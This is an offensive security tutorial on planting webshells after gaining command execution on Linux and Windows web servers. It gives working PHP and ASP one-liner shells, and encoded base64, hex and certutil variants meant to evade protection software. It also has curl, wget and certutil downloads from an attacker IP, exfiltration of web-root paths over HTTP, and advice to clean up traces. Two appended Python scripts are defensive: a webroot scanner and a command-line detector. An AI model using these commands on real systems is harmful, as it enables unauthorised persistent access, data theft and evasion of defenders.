0x01 Preface
After obtaining command execution through an RCE (remote command execution) or MSSQL injection vulnerability, how do you write a Webshell? Here we run tests against several scenarios that may be encountered: Linux/Windows, with/without Internet access, and with/without command echo.
Generally, once we are sure we can execute commands, we go straight to a CS/MSF session, but we also run into targets with no Internet access and no echo. In that case we may need to find the absolute path of the target website and write a Webshell first, and only then carry out information collection and intranet penetration.
Note: we can upload an arbitrary file through the site's front-end or back-end upload function, then use commands such as for on Windows or find on Linux to locate the file we just uploaded (or an existing file under the website) and obtain the absolute path, and finally write the Webshell there. The rest of this article walks through that.
0x02 Linux
(1) The target has Internet access and the command is echoed
If the target host can reach the Internet and executed commands are echoed, we can obtain the absolute path of the target website directly by executing the following commands, then write or download the Webshell using any of the methods below.
Find absolute paths:
locate 1653042293000.png 2>/dev/null
find / -name 1653042293000.png 2>/dev/null
find / 2>/dev/null | grep 1653042293000.png
find /var/www/html/ -name "*.php" | xargs grep "so-and-so website"
Write in the normal way:
echo '<?php eval($_POST[1]);?>' > /var/www/html/shell.php
Remote download write:
curl http://192.168.1.120/shell.txt > /var/www/html/shell.php
wget http://192.168.1.120/shell.txt -O /var/www/html/shell.php

(2) The target has Internet access and the command is not echoed
If the target host can reach the Internet but there is no echo when executing commands, we can use the httplog method: the commands below send the absolute path of the target website to an HTTP server we control, after which we write the Webshell with the methods below. If characters are being escaped or blocked by protection software, try writing an encoded payload.
Find absolute paths:
python -m SimpleHTTPServer 8888   # run on our own host; the path shows up in its access log
curl http://192.168.1.120:8888/`find / | grep 1653042293000.png`
wget http://192.168.1.120:8888/`find / | grep 1653042293000.png`
Write in encoding:
echo PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+ | base64 -d > /var/www/html/shell.php
echo 3C3F706870206576616C28245F504F53545B315D293B3F3E | xxd -r -ps > /var/www/html/shell.php

(3) The target has no Internet access and the command is not echoed
If the target host cannot reach the Internet and there is no echo when executing commands, we can execute the first command below to write the absolute path of every copy of 1653042293000.png into the directory that contains it and then read that path.txt through the website, or we can write the Webshell into that same directory in a single step.
In practice it is best to first determine the absolute path of the target website and then write the Webshell separately. Avoid using the second command directly, because if files with the same name exist elsewhere on the host the Webshell will be written to every path found. After writing the file, also remember to clean up traces.
Find the absolute path to write to the web directory:
find / -name 1653042293000.png | while read f;do sh -c 'find / -name 1653042293000.png' >$(dirname $f)/path.txt;done
Find the absolute path to write to the Webshell:
find / -name 1653042293000.png | while read f;do sh -c "echo PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+ | base64 -d">$(dirname $f)/shell.php;done
find / -name 1653042293000.png | while read f;do sh -c "echo 3C3F706870206576616C28245F504F53545B315D293B3F3E | xxd -r -ps">$(dirname $f)/shell.php;done
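From the defender's side, the Linux write methods above all leave the same artefacts in the web root: a one-liner shell file, a script sitting inside an upload directory, or a path.txt dropped beside the uploaded image. The following scanner is an added example, not code from the original article; the signatures, the extension sets and the sample web root it builds in a temporary directory are constructed assumptions for the demonstration.

```python
import os
import re
import tempfile

# Signatures of the one-liner shells the article writes (PHP and ASP forms).
WEBSHELL_PATTERNS = [
    re.compile(rb"<\?php\s*eval\s*\(\s*\$_(POST|GET|REQUEST)\b", re.I),
    re.compile(rb"<%\s*execute\s+request\s*\(", re.I),
]
SCRIPT_EXT = {".php", ".phtml", ".asp", ".aspx", ".jsp"}  # never belong in uploads
IMAGE_EXT = {".png", ".jpg", ".jpeg", ".gif"}


def scan_webroot(root):
    """Return sorted (relative_path, reason) findings under the web root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        # Heuristic: a directory holding images is treated as an upload directory.
        upload_dir = any(os.path.splitext(f)[1].lower() in IMAGE_EXT for f in files)
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            ext = os.path.splitext(name)[1].lower()
            # path.txt beside uploads is the marker left by the no-echo, no-Internet method.
            if name == "path.txt" and upload_dir:
                findings.append((rel, "path listing dropped beside uploads"))
            if ext in SCRIPT_EXT and upload_dir:
                findings.append((rel, "script file inside an upload directory"))
            with open(path, "rb") as fh:
                head = fh.read(4096)  # one-liner shells sit at the very start
            if any(p.search(head) for p in WEBSHELL_PATTERNS):
                findings.append((rel, "one-liner webshell signature"))
    return sorted(findings)


def build_sample_webroot():
    """Constructed web root reproducing the article's layout (demo input only)."""
    root = tempfile.mkdtemp(prefix="webroot-")
    os.makedirs(os.path.join(root, "uploads"))
    samples = {
        "index.php": b"<?php echo 'hello'; ?>",
        "uploads/1653042293000.png": b"\x89PNG\r\n\x1a\n",
        "uploads/path.txt": b"/var/www/html/uploads/1653042293000.png\n",
        "uploads/shell.php": b"<?php eval($_POST[1]);?>",
        "shell.asp": b'<%execute request("1")%>',
    }
    for rel, data in samples.items():
        with open(os.path.join(root, rel), "wb") as fh:
            fh.write(data)
    return root
```

Running scan_webroot(build_sample_webroot()) reports the two shell files and the stray path.txt while leaving index.php and the image alone; in production, point it at the real document root and pair it with file-creation auditing on that directory.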

0x03 Windows
(1) The target has Internet access and the command is echoed
If the target host can reach the Internet and executed commands are echoed, we can obtain the absolute path of the target website by executing commands such as dir, where, for and findstr, or by reading the IIS configuration, then write or download the Webshell using any of the methods below.
Find absolute paths:
dir /a/b/s C:\1653042293000.png
where /r C:\ 1653042293000.png
for /r "C:\" %i in (1653042293000.png*) do @echo %i
findstr /n /s /i "so-and-so website" C:\*.asp
%windir%\system32\inetsrv\appcmd list VDIR
Write in the normal way:
set /p="<%execute request("1")%>" <nul >> C:\inetpub\wwwroot\shell.asp
echo ^<%execute request("1")%^> > C:\inetpub\wwwroot\shell.asp
certutil -urlcache -split -f http://192.168.1.105:8080/shell.txt C:\inetpub\wwwroot\shell.asp

(2) The target has Internet access and the command is not echoed
If the target host can reach the Internet but there is no echo when executing commands, we can run the following for loop to search the C drive recursively for 1653042293000.png, save the absolute path of each match in the %i variable, and then have certutil send that path to our HTTP server (httplog), or write the Webshell straight into the directory. If characters are escaped or blocked by protection software, try writing an encoded payload; the intermediate shell.txt needs to be cleaned up afterwards.
Find absolute paths:
python -m SimpleHTTPServer 8888   # run on our own host; the path shows up in its access log
for /r C:\ %i in (1653042293000.png*) do certutil -urlcache -split -f http://192.168.1.120:8888/%i
Write in the normal way:
for /r C:\ %i in (1653042293000.png*) do echo ^<%execute request("1")%^> > %i/../shell.asp
Write in encoding:
for /r C:\ %i in (1653042293000.png*) do echo PCVleGVjdXRlIHJlcXVlc3QoIjEiKSU+ > %i/../shell.txt & certutil -decode %i/../shell.txt %i/../shell.asp
for /r C:\ %i in (1653042293000.png*) do echo 3C256578656375746520726571756573742822312229253E > %i/../shell.txt & certutil -decodehex %i/../shell.txt %i/../shell.asp

(3) The target has no Internet access and the command is not echoed
If the target host cannot reach the Internet and there is no echo when executing commands, we can execute the following commands to write the absolute path of 1653042293000.png into the directory that contains it, or write the Webshell into that same directory. If characters are escaped or blocked by protection software, try writing an encoded payload.
Although the commands look similar, the first variant is more efficient because it writes while the enumeration is still running, whereas the second must finish enumerating before it writes, so I personally recommend the first. Remember to clean up traces under every path where a file of the same name was found.
Find the absolute path to write to the web directory:
for /r C:\ %i in (1653042293000.png*) do echo %i> %i\..\path.txt
for /f %i in ('dir /s /b C:\1653042293000.png') do echo %i> %i\..\path.txt
forfiles /P C:\ /S /M 1653042293000.png /C "cmd /c dir /a/b/s C:\1653042293000.png > path.txt"
Find the absolute path to write to the Webshell:
for /r C:\ %i in (1653042293000.png*) do echo ^<%execute request("1")%^> > %i/../shell.asp
for /f %i in ('dir /s /b C:\1653042293000.png') do echo ^<%execute request("1")%^> > %i/../shell.asp
forfiles /P C:\ /S /M 1653042293000.png /C "cmd /c echo ^<%execute request("1")%^> > shell.asp"
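Every method in the Linux and Windows sections runs through a child shell, so the process command lines recorded by auditd, Sysmon or an EDR sensor are where a defender sees them. The detector below is an added example, not code from the original article: it encodes the article's own discovery and write commands as rules (decode or download into a web root, certutil decoding to a script, a drive-wide file-name hunt combined with a write, and a path smuggled into an HTTP URL) and runs them over constructed sample telemetry. The WEBROOT alternation and the sample lines are assumptions for the demonstration.

```python
import re

WEBROOT = r"(?:/var/www|/srv/http|htdocs|wwwroot|inetpub)"
# Each rule is (name, regex over one recorded process command line). The patterns
# mirror the article's commands; extend WEBROOT with your own document roots.
RULES = [
    ("decode-into-webroot",
     re.compile(r"\b(?:base64\s+-d|xxd\s+-r)\b.*>\s*\S*" + WEBROOT, re.I)),
    ("download-into-webroot",
     re.compile(r"\b(?:curl|wget|certutil\s+-urlcache)\b.*\S*" + WEBROOT, re.I)),
    ("certutil-decode-to-script",
     re.compile(r"\bcertutil\s+-decode(?:hex)?\b.*\.(?:asp|aspx|php|jsp)\b", re.I)),
    ("filename-hunt-with-write",
     re.compile(r'(?:\bfind\s+/\s+-name\b|\bfor\s+/r\s+"?[A-Za-z]:\\'
                r'|\bdir\s+/s\s+/b\s+[A-Za-z]:\\|\bforfiles\s+/P\s+[A-Za-z]:\\)'
                r".*(?:>|while\s+read)", re.I)),
    ("path-exfil-over-http",
     re.compile(r"\b(?:curl|wget|certutil)\b.*https?://\S*(?:`|\$\(|%[~a-z]*i\b)", re.I)),
]


def detect(command_lines):
    """Return (rule, command_line) pairs for every rule each line trips."""
    hits = []
    for line in command_lines:
        for name, rx in RULES:
            if rx.search(line):
                hits.append((name, line))
    return hits


# Constructed sample telemetry (process command lines as a sensor would record
# them). The first seven reproduce the article's commands; the last two are
# routine administration and must not alert.
SAMPLE = [
    "sh -c echo PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+ | base64 -d > /var/www/html/shell.php",
    "wget http://192.168.1.120/shell.txt -O /var/www/html/shell.php",
    "curl http://192.168.1.120:8888/`find / | grep 1653042293000.png`",
    "find / -name 1653042293000.png | while read f;do sh -c 'find / -name 1653042293000.png' >$(dirname $f)/path.txt;done",
    "cmd.exe /c for /r C:\\ %i in (1653042293000.png*) do certutil -urlcache -split -f http://192.168.1.120:8888/%i",
    "certutil -decode C:\\inetpub\\wwwroot\\shell.txt C:\\inetpub\\wwwroot\\shell.asp",
    "cmd.exe /c for /r C:\\ %i in (1653042293000.png*) do echo %i> %i\\..\\path.txt",
    "base64 -d /tmp/cert.b64 > /etc/ssl/certs/site.pem",
    "find /var/log -name '*.gz' -mtime +30 -delete",
]
```

detect(SAMPLE) fires exactly once for each of the seven attack lines and stays silent on the two benign ones; the "filename-hunt-with-write" rule deliberately requires a redirection or a while-read loop, because a bare recursive search is too common to alert on.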

Conclusion:
This article divides the ways of finding the absolute path into three: command search (with echo), httplog exfiltration (without echo), and writing into the web directory (without Internet access); and the ways of writing the file into three: regular write, encoded write, and remote download. Linux and Windows follow the same approach with different commands: both locate the absolute path by file name or file content, and then use ordinary file-writing and download commands to get a shell.